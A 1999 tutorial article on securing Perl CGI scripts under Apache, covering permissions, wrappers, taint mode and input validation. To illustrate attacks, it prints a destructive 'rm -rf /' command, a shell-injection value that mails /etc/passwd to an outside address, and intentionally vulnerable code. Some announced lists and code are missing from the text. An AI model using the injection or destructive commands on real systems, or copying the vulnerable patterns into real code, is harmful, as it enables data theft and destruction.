CGI Security : Better Safe than Sorry

Published on: Sunday 19th September 1999 By: Pankaj Kamthan

Introduction

CGI was the first, and remains one of the most widely used, means of extending Web servers by interfacing them with external applications.

However, the power of CGI comes at a price. CGI interfaces can completely compromise the security of a Web server, and thus of the host on which it is running. All benefits of a CGI script are neutralized if it is insecure. It is impossible to anticipate (and defend against) all security holes, but by following a few guidelines you can avoid known security holes and unsafe practices.

In dealing with the CGI security issues, our focus will be the following questions:

What type of potential CGI security problems exist? How do they arise? What can be the consequences of these problems? How, and to what extent, can these problems be eliminated?

For the sake of this article, we will restrict ourselves to UNIX-type environments, although many ideas presented here carry over to other systems. When referring to a programming language, we will refer to Perl exclusively as it has established itself as the language of choice for CGI programming. Also, even though the CGI is independent of any server, we will incline our discussion towards Apache, the most popular Web server in use today.

CGI Security Breach : Origins and Consequences

The first step towards tackling the CGI security issues requires finding the origins of the problems. This in turn requires identification of all the different components involved in the entire CGI communication process. (Note that not all of these are involved in all cases.) They are:

  1. The User. A person, possibly an intruder (such as a hacker, masquerader, counterfeiter, or eavesdropper), or a program (such as a virus).
  2. HTML form or searchable index.
  3. HTTP and CGI protocols.
  4. The CGI script.
  5. Compiler/interpreter that runs the CGI script (which depends on the language the script is written in).
  6. External data (that comes from the user in 1. above).
  7. External programs that the script calls.
  8. Client-side techniques, such as JavaScript, used in conjunction with the CGI.
  9. The Web browser.
  10. The Web server.

Figure 1 presents a schematic of the CGI communication between the Web client and server.

Here are some remarks on the effect of the above components. The main sources of CGI security problems are 2, 4, 6, 7 and 10, which result in insecure data, insecure code, or insecure server. 6 can pose a major security problem when it comes in contact with 7. It is possible that 3, 5 or 7 themselves could lead to security problems. Discussion of that is beyond the scope of this article. 8 and 9 are client-side technologies and don't really have a direct relationship with the CGI security issue. 8, however, can affect 6.

This article is primarily targeted towards developers who write CGI scripts; however, we have also provided a section for those who use pre-built CGI scripts for their purposes.

Figure 1. CGI Communication between the Web Client and Server.

CGI scripts can present security holes in two ways:

  1. They may intentionally or unintentionally leak information about the host system that can result in a break-in.
  2. Scripts that process remote user input, such as the contents of a form or a "searchable index" command, may be vulnerable to attacks in which the remote user tricks them into executing commands.

Security holes present in CGI scripts on Web sites can be exploited for various frivolous purposes, including the following:

Server-Side Configuration for CGI Scripts

Server Configuration for CGI Scripts

CGI scripts reside within the Web server-accessible directory. Any lapses in the server configuration can lead to CGI security problems. Therefore, knowing appropriate server configurations can be helpful:

Moral: Fix a single directory, such as cgi-bin, for serving CGI scripts only, and abide by it.

CGI Script Privileges

007 Can not be Trusted

You should make sure that CGI scripts have only the permissions required for the task they perform. In UNIX, you can set these with the chmod command. For example, search scripts (and various others which do not let users write to the server) usually run under the mode "755".
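A permission check of this kind can also be scripted. The following is a minimal sketch, assuming a hypothetical helper named world_writable and a placeholder script path; it tests the world-write bit and tightens the mode to 755 if the bit is set.

```perl
use strict;
use warnings;

# Return true if "other" users may write to the file at $path.
# Hypothetical helper, not part of any standard module.
sub world_writable {
    my ($path) = @_;
    my @st = stat($path) or die "Cannot stat $path: $!";
    my $mode = $st[2] & 07777;      # keep only the permission bits
    return ($mode & 0002) ? 1 : 0;  # 0002 is the world-write bit
}

# Example: tighten a script to mode 755 if it is world-writable.
# The path below is an assumed placeholder.
my $script = '/path_to/cgi-bin/search.pl';
if (-e $script && world_writable($script)) {
    chmod 0755, $script or die "Cannot chmod $script: $!";
}
```

The check is deliberately narrow: it looks only at the world-write bit, which is the one that lets any local user replace the script.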

"NOBODY" can be a Threat to Everybody

Even if the server is run as "nobody," CGI scripts are potential security holes. A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, or even launch a log-in session on a high-numbered port. Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.

CGI Scripts with Extra Privileges

There are cases where some scripts need to grant extra privileges to their users, without giving away other privileges that they did not intend to give away. These scripts need to run with permissions different from those of the Web server itself (usually user "nobody"). On UNIX, one way to do that is to make the CGI script suid. The script then runs with the permissions of the owner of the file, rather than those of the Web server, which lets the script access resources that it otherwise could not.

In Perl, it can be done as follows:

Running a script as suid can, however, be dangerous. The need for a script to run as suid should be carefully examined. It represents a major risk because it gives your script more privileges than the "nobody" user has. Weaknesses in setuid scripts can let a malicious user access not only files that the low-privilege Web server user can access, but also any that could be accessed by the user the script runs as. (That is why scripts should be run with the lowest possible privilege.) It also increases the potential for damage that a subverted script can cause. Many UNIX systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in an error message from Perl itself. One way to avoid that is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do.

Moral: Make sure that CGI script permissions are set correctly. Unless absolutely necessary, do not run a script under "suid." Avoid "setuid root." In any case, use a CGI wrapper, if possible.

CGI Wrappers

CGI scripts can be made safer in some situations by placing them inside a CGI "wrapper" script. Wrappers may perform certain security checks on the script, change the ownership of the CGI process, or use the UNIX chroot() mechanism to place the script inside a restricted part of the file system.

There are three major wrappers available for UNIX systems that we discuss here:

CGIWrap

CGIWrap is a gateway program that puts a wrapper around CGI scripts and thus allows general users to use CGI scripts without compromising the security of the Web server. Scripts are run with the permissions of the user who owns the script (rather than, for example, "nobody"). In addition, several security checks are performed on the script, which will not be executed if any check fails. A policy can be enforced so that users must use CGIWrap in order to execute CGI scripts. This simplifies administration and prevents users from interfering with each other.

To see what CGIWrap buys you, and its caveats, consider the situation without it. When all CGI scripts run under the server's user ID, it is difficult for administrators to determine, for example, whose script is generating bounced mail or introducing errors in the server log. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script. CGIWrap removes these problems, but it increases the risk to the individual user; a subverted CGI script can trash the user's home directory by executing the command:

/bin/rm -rf /

Since the subverted CGI script has write access to the user's home directory, it could also place a trojan horse in the user's directory.

SBOX

sbox, like CGIWrap, can run CGI scripts as the author's user ID. However, it takes additional steps to prevent CGI scripts from causing damage. It optionally performs a chroot to a restricted directory, isolating the script from the user's home directory. It can also set resource allocation limitations on CGI scripts which prevents certain denial-of-service attacks.

suEXEC

The Apache Web server comes with its own wrapper script called suEXEC. suEXEC provides the same functionality as CGIWrap, but, in addition, you can (using the User and Group directives in the <VirtualHost> section of the configuration file httpd.conf) have scripts run with the permissions of that user and group.

Normally, when a CGI or Server-Side Includes (SSI) script executes, it runs as the same user who is running the Web server. The suEXEC feature provides Apache users with the ability to run CGI (and SSI) scripts under user IDs different from the user ID of the calling Web server. When an HTTP request is made for a CGI (or SSI) script, Apache provides the suEXEC wrapper with the script's name and the user and group IDs under which the program is to execute. The wrapper then performs a series of tests to determine success or failure of the request. If any one of the tests fails, the program logs the failure and exits with an error.

Using suEXEC requires managing setuid root programs and the security issues they present. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI (or SSI) scripts. However, if suEXEC is improperly configured, it can cause any number of problems and possibly create new security holes in your system.

Moral: CGI wrappers are useful but they are not magic bullets. If you use them, make sure you are aware of their features (and limitations). Specifically, use suEXEC only if you have the requisite background to do so.

The Language of Choice for CGI Scripts : Compiled Vs. Interpreted

CGI scripts are written using a programming language, and the language of choice plays a key role in the security issues around them:

All this being said, there is no guarantee that a compiled program will be safe. Interpreted languages such as Perl contain a number of built-in features (for example, the tainting mechanism) that were designed to catch potential security holes, and may make Perl scripts safer in some respects than the equivalent C program.

Embedded Interpreters in Apache and CGI Scripts

Apache can be extended by embedding language interpreters. For example, mod_perl is an Apache module which embeds the Perl language interpreter into it. This opens up an entire host of new applications which have previously been nonexistent. Often, CGI/Perl scripts tend to suffer from performance problems; with the use of mod_perl, one can have significant performance gain when running such scripts under Apache. These CGI scripts can now also access Apache internals.

Since mod_perl runs within an Apache httpd child process, it runs with the user/group ID specified in the httpd.conf file. Therefore, there are a few security considerations that you should be aware of:

HTML Forms and the Script

Sanity Checks

You should perform sanity checks on the submitted data; for example, verify that every HTML form element that is expected to return a value actually does so.
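One such check can be sketched as follows. This is a minimal illustration, assuming the form data has already been decoded into a hash; the helper name missing_fields and the field names are hypothetical.

```perl
use strict;
use warnings;

# Return the names of required fields that are missing or blank.
# %$params is assumed to hold already-decoded form data.
sub missing_fields {
    my ($params, @required) = @_;
    return grep {
        !defined $params->{$_} || $params->{$_} !~ /\S/
    } @required;
}

# Hypothetical form submission with one empty and one absent value.
my %form = (name => 'Albert', email => '', comment => undef);
my @missing = missing_fields(\%form, qw(name email comment));
print "Missing fields: @missing\n" if @missing;
```

A script would normally refuse to continue, and redisplay the form, whenever the returned list is not empty.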

Script Invocation

Although you can restrict access to a script to certain IP addresses (using, for example, <Limit>...</Limit> directives in the Apache configuration file access.conf) or to user name/password combinations (using, for example, Basic authentication in Apache), you cannot control how the script is invoked. A script can be invoked from any form, anywhere in the world, and even by directly requesting its URL. Referer gateways are good examples of such a case. When restricting access to a script, restrictions should be placed on the script as well as on any HTML forms that access it. This is obviously the case when the script itself (dynamically) generates the requisite HTML document (containing the forms). In other cases, you can use the CGI environment variable HTTP_REFERER, which provides the URL of the document that the browser was displaying before it accessed the CGI script, to restrict access. Because this value is supplied by the client and can be forged, it is a convenience check rather than a guarantee.
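A check on HTTP_REFERER might look like the sketch below. The allowed URL prefix and the helper names are assumptions made for illustration, and the check should be treated as a coarse filter only.

```perl
use strict;
use warnings;

# Hypothetical URL prefix of the form that is allowed to call the script.
my $ALLOWED_PREFIX = 'http://www.example.org/forms/';

# Return true if the referring URL starts with the allowed prefix.
sub referer_allowed {
    my ($referer) = @_;
    return 0 unless defined $referer;
    return index($referer, $ALLOWED_PREFIX) == 0 ? 1 : 0;
}

# Build a minimal CGI response refusing the request.
sub forbidden_response {
    return "Status: 403 Forbidden\r\n"
         . "Content-Type: text/plain\r\n\r\n"
         . "This script must be called from its own form.\n";
}

# A real script would stop processing after printing the refusal.
print forbidden_response() unless referer_allowed($ENV{HTTP_REFERER});
```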

Hidden Variables

Hidden variables should not be relied upon for security. This is because the hidden variables are in fact visible in the HTML that the server sends to the browser; all a user has to do is view the source of the document. After that, the user can set the hidden variables to his/her desire and send it back to the script. An example of a script using hidden variables (for state persistence) is the shopping cart script in the article E-Store on the Web : Let's Go Shopping!

CGI Scripts Calling External Programs

In Perl, you can invoke external programs in many different ways: you can capture the output of an external program using backtick quotes; you can open up a pipe to a program; you can invoke an external program and wait for it to return with system(); you can invoke an external program (and never return) with exec(). All of these constructions can be risky if they involve user input that may contain shell metacharacters. You should therefore try to find ways not to open a shell. It is safer to call an external program directly than going through a shell. However, this approach, though safe, essentially precludes programs that need to access external programs.

Information (Over)exposure

There are scripts that leak system information. For example, CGI gateways to the UNIX finger command often print out the physical path to the fingered user's home directory, the w command gives information about what programs local users are using, and the ps command gives out valuable information on daemons running on the system.

Moral: Avoid giving out too much information about your site and server host.

Backtick Quotes

Backtick quotes (`...`), available in Perl (and shell interpreters) for capturing the output of programs as text strings, are dangerous. For example

print `/path_to/finger $input{'user_input'}`;

expects the user input to be somebody's username. However, that may not always be the case.

Moral: Avoid backticks in CGI scripts.
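When the output of a program must be captured, the list form of open() is one alternative to backticks. The sketch below is an illustration under stated assumptions: the helper name capture_no_shell is hypothetical, and the running Perl interpreter ($^X) stands in for finger so that the example runs on any host.

```perl
use strict;
use warnings;

# Run a command and return its output without starting a shell.
# The list form of open() passes each argument to the program as-is.
sub capture_no_shell {
    my (@cmd) = @_;
    open(my $fh, '-|', @cmd) or die "Cannot run $cmd[0]: $!";
    local $/;                 # slurp all output at once
    my $output = <$fh>;
    close $fh;
    return $output;
}

# The "; echo hacked" part stays a literal argument; no shell sees it.
my $user_input = 'einstein; echo hacked';
print capture_no_shell($^X, '-e', 'print "arg: $ARGV[0]\n"', $user_input);
```

Avoiding the shell does not make the input trustworthy; a value beginning with a hyphen, for instance, could still be read as an option by the called program, so the input should be validated as well.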

Calling Shell Commands eval(), exec(), system()

It is very important that you understand what damage these calls can do. In some cases, you can avoid passing user-supplied variables through the shell by calling external programs differently.

For example, here is a Perl script that tries to send mail to an address indicated in a fill-out form:

$mail_to = &get_input; # read the address from form
open (MAIL,"| /path_to/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: somebody\n\n Hello\n";
close MAIL;

The problem is in the piped open() call. The script author assumed that the contents of the $mail_to variable will always be just an e-mail address. However, this may not be the case. If the following is entered:

nobody@nowhere;mail somebody@somewhere</etc/passwd;

the open() statement will evaluate the following command:

/path_to/sendmail nobody@nowhere; mail somebody@somewhere</etc/passwd

Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to a password-cracking attack.

This situation can be avoided. sendmail supports a -t flag, which tells it to ignore the address given on the command line and take its To: address from the e-mail header. There is also the -oi flag to prevent sendmail from ending the message prematurely if it encounters a period at the start of a line. The example above can be rewritten in order to take advantage of these features:

$mailto = &get_input; # read the address from form
open (MAIL,"| /path_to/sendmail -t -oi");
print MAIL <<END;
To: $mailto
From: somebody(somebody\@somewhere)
Subject: something
...
END
close MAIL;

In Perl, you can pass arguments directly to external programs rather than going through the shell, by using Perl's implementation of the system() and exec() functions. If you pass the arguments to the external program not in one long string but as separate members of a list, Perl will not go through the shell, and shell metacharacters will have no undesired side effects. For example, instead of:

system "/path_to/sort < foo.in";

write this:

system "/path_to/sort","foo.in";
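The list form can be wrapped in a small helper that also checks the result. This is a sketch, assuming a hypothetical helper named run_no_shell; it uses the indirect-object form of system(), which bypasses the shell even when the list has only one element.

```perl
use strict;
use warnings;

# Run a command in list form (no shell) and return its exit code.
sub run_no_shell {
    my (@cmd) = @_;
    my $status = system { $cmd[0] } @cmd;
    die "Cannot start $cmd[0]: $!" if $status == -1;
    die "$cmd[0] died from signal " . ($status & 127) if $status & 127;
    return $status >> 8;      # the exit code is in the high byte
}

# The running Perl interpreter ($^X) stands in for an external program.
my $code = run_no_shell($^X, '-e', 'exit 3');
print "exit code: $code\n";
```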

This feature can also be used to open a pipe without going through a shell. By calling open on the character sequence |-, you fork a copy of Perl and open a pipe to that copy. The child copy can then "exec" another program using the argument list variant of exec().

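my $result = open(SORT,"|-");
die "Couldn't open pipe to subprocess" unless defined($result);
if ($result == 0) {
  # Child: replace this process with sort, bypassing the shell.
  exec "/path_to/sort",$user_variable or die "Couldn't exec sort";
}
# Parent: feed the lines to the child through the pipe.
for my $line (@lines) {
  print SORT $line,"\n";
}
close SORT;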

The initial call to open() tries to fork a copy of Perl. If the call fails, it returns an undefined value and the script immediately dies; otherwise it returns zero to the child process and the child's process ID to the parent. The child process checks the result value, and immediately attempts to "exec" the sort program. If anything fails at this point, the child quits. The parent process can then print to the SORT filehandle in the usual manner. To read from a pipe without opening up a shell, you can do something similar with the sequence -|:

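$result = open(EGREP,"-|");
die "Couldn't open pipe to subprocess" unless defined($result);
if ($result == 0) {
  # Child: run egrep directly; -i ignores case, -e marks the pattern.
  exec "/path_to/egrep",'-i','-e',$user_pattern,$filename
    or die "Couldn't exec egrep";
}
# Parent: read the matching lines from the child.
while (<EGREP>) {
  print "match: $_";
}
close EGREP;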

Moral: Wherever possible, avoid opening a shell. If you must open one, check the return status of every system call.

Exposing External Data to the Shell

The following call exposes user data to the shell and is therefore a potential security threat:

system ("/path_to/finger $user_input");

The problem is that any shell metacharacters can be passed through it. The list of shell metacharacters is extensive:

&;`'\"|*?~<>^()[]{}$\n\r

In case you have to open a shell, you should always scan the arguments for shell metacharacters and remove them. The best way is to check incoming data for the exact pattern that is desired. The Perl regular expressions that can be used for this purpose are given in the Appendix.

For example, one way to assure that the $mail_to address created by the user really does look like a valid address is:

$mail_to = &get_name_from_input;
unless ($mail_to =~ /^[\w.+-]+\@[\w.+-]+$/) {
  die 'The address is not in form einstein@irt.org';
}

Moral: Never pass unchecked remote user input to a shell command. Match legal characters rather than filtering out disallowed ones (a complete list of which is much harder to get right).
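The match-what-is-legal approach can be packaged as a reusable check. The sketch below assumes a hypothetical helper named checked_address. It anchors the pattern with \A and \z instead of ^ and $, because $ also matches just before a trailing newline.

```perl
use strict;
use warnings;

# Return the address if it consists only of permitted characters,
# otherwise return undef. The pattern is deliberately conservative
# and is not a full RFC-compliant address parser.
sub checked_address {
    my ($raw) = @_;
    return undef unless defined $raw;
    return $raw =~ /\A([\w.+-]+\@[\w.+-]+)\z/ ? $1 : undef;
}

for my $candidate ('einstein@irt.org', 'nobody@nowhere;mail x</etc/passwd') {
    my $ok = checked_address($candidate);
    print defined $ok ? "accepted: $ok\n" : "rejected: $candidate\n";
}
```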

Tainting

One of the most frequent security problems in CGI scripts is inadvertently passing unchecked user-supplied variables, or "tainted variables," to the shell. Tainted variables are those that contain data originating from outside the script, including data read from environment variables, from the command-line argument array, or from standard input. Perl provides a "taint checking" mechanism that prevents you from doing this. This feature checks for tainted variables and refuses to pass them to subshells or to eval(). In Perl 5, the Perl "taint mode" can be enabled by placing the "-T" option at the beginning of the Perl script:

#!/usr/local/bin/perl -T

(Perl 4 does not support the -T flag. Instead, Perl 4 distributions typically come with a separate executable called taintPerl.)

The tainting mechanism has the following characteristics:

See the CGI/Perl Taint Mode FAQ for more details on the tainting mechanism in CGI/Perl scripts.

Moral: Use Perl's tainting features for all CGI scripts written in Perl.
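Under taint mode, a value becomes usable again only after it has been extracted through a regular-expression capture. The sketch below assumes a hypothetical helper named untaint_username and an illustrative character set; it also runs without -T, in which case nothing is reported as tainted.

```perl
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Untaint a user name by capturing only the characters we allow.
# Under -T, the captured $1 is considered clean; the original is not.
sub untaint_username {
    my ($raw) = @_;
    return undef unless defined $raw;
    return $raw =~ /\A([A-Za-z0-9_]{1,32})\z/ ? $1 : undef;
}

# Take the name from the command line, or fall back to a sample value.
my $raw  = defined $ARGV[0] ? $ARGV[0] : 'einstein';
my $user = untaint_username($raw);
die "Illegal user name\n" unless defined $user;
printf "raw tainted: %s, cleaned tainted: %s\n",
    (tainted($raw)  ? 'yes' : 'no'),
    (tainted($user) ? 'yes' : 'no');
```

The pattern should be as strict as the data allows; a capture such as (.*) would untaint anything and defeat the purpose of the mechanism.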

Path Environment Variable to Resolve Partial Path Names to Locate External Programs

The PATH environment variable can be altered so that it points to the program the user wants your script to execute rather than the program you are expecting. You should invoke the programs using their full absolute pathnames instead. If you must rely on the PATH, set it yourself at the beginning of your CGI script. In general, it is not a good idea to put the current directory (".") into the path.

Moral: Invoke external programs by their absolute pathnames. If you must rely on the PATH environment variable, set it explicitly in the script.
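Setting the path at the top of a script takes only a few lines. In the sketch below, the helper name sanitize_environment and the directory list are assumptions; the other variables removed are ones that can also influence how a shell locates or runs programs.

```perl
use strict;
use warnings;

# Replace the inherited search path with a small, known one and
# drop variables that can change how a shell behaves.
# The directory list is an assumption; adjust it for the host.
sub sanitize_environment {
    $ENV{PATH} = '/bin:/usr/bin';
    delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
    return;
}

sanitize_environment();
print "PATH is now $ENV{PATH}\n";
```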

General Considerations

There are some general design considerations that can be followed to avoid CGI security problems:

Pre-Built CGI Scripts : There is no Free Lunch

Software reuse is a popular trend in the programming world: "avoid reinventing the wheel wherever you can." However, this practice comes with a price when programs are used as "black-boxes."

As an example, pre-built CGI scripts may contain security bugs unknown to their users. Therefore, if used at all, pre-built CGI scripts should be used with caution and various questions should be asked (and answered to a satisfactory extent) prior to their use. Here is a checklist:

  1. How complex is the script? The longer the script, the more likely it is to have problems.
  2. Does the script read and/or write files on the host system? Programs that read files may inadvertently violate access restrictions, or pass sensitive system information to unauthorized users. Programs that write files have the potential to modify documents, or, in the worst case, introduce trojan horses in your system.
  3. Does the script interact with external programs on your system? If yes, does it do so in a safe manner? For example, does the script use explicit path names when invoking these programs (instead of using the PATH environment variable to resolve partial path names)?
  4. Does the script run with suid privileges? This is usually not considered safe.
  5. Does the script validate user input from forms? Undesired user input is one of the primary causes of CGI security breach.

For a detailed account on this issue, see the article Security Issues When Installing and Customizing Pre-Built Web Scripts.

Moral: Use pre-built CGI scripts with caution and perform security checks before using them. If these scripts are in Perl, you should enable the Perl-specific security mechanisms. Regularly visit the sites that distribute them for updates and patches.

Conclusion

CGI Ahead : Script with Caution

Computer security is a give-and-take situation. There is no perfectly secure system. Thus, security is more about acceptable risk and emergency recovery than impregnability. That being said, not all possible CGI security problems (and hence solutions) can be identified a priori. The practices described here reduce the risk of security breaches but don't eliminate it. Also, even if the script seems safe, there is always the possibility that the external programs it uses may themselves be vulnerable.

Acknowledgements

Many of the examples introduced in the section CGI Scripts Calling External Programs are adapted from The World Wide Web Security FAQ, and their use is hereby acknowledged.

Appendix : A Summary of Perl Regular Expressions

EXPRESSION    FUNCTION
/abc/         Matches abc anywhere within the string.
/^abc/        Matches abc at the beginning of the string.
/abc$/        Matches abc at the end of the string.
/a|b/         Matches either a or b.
/ab{m,n}c/    Matches an a followed by m to n b's, followed by c, where m and n are nonnegative integers with m <= n. If the second number is omitted, as in /ab{m,}c/, the expression matches m or more b's.
/ab*c/        Matches an a followed by zero or more b's, followed by c.
/ab+c/        Matches an a followed by one or more b's, followed by c.
/ab?c/        Matches an a followed by an optional b, followed by c. In Perl 5, the expression /ab*?c/ matches an a followed by as few b's as possible, followed by c.
/./           Matches any single character except a newline (\n). /a..d/ matches an a followed by any two characters, followed by d.
/[abc]/       Matches any one of a, b, or c. A pattern of /[abc]+/ matches strings such as abcab, acbc, abbac, and so on.
/\d/          Matches a digit. Multipliers can be used. (/\d+/ matches one or more digits.)
/\w/          Matches a word character (a letter, a digit, or an underscore).
/\s/          Matches a whitespace character.
/\b/          Matches a word boundary. /cde\b/ matches cde, but not cdef. Inside a character class, that is, [\b], \b matches a backspace character instead.
/[^abc]/      Matches a character that is not in the class. /[^abc]+/ will match a string such as defg.
/\D/          Matches a character that is not a digit.
/\W/          Matches a character that is not a word character.
/\S/          Matches a character that is not whitespace.
/\B/          Requires that there is no word boundary. /perl\B/ matches the perl in perlscript, but not in perl script.
/\*/          Matches the * character. Use the \ character to escape characters that have significance in a regular expression.
/(abc)/       Matches abc anywhere within the string; the parentheses act as memory, storing abc in the variable $1.
/abc/i        Ignores case. Matches abc, Abc, ABc, and so on.


©2018 Martin Webb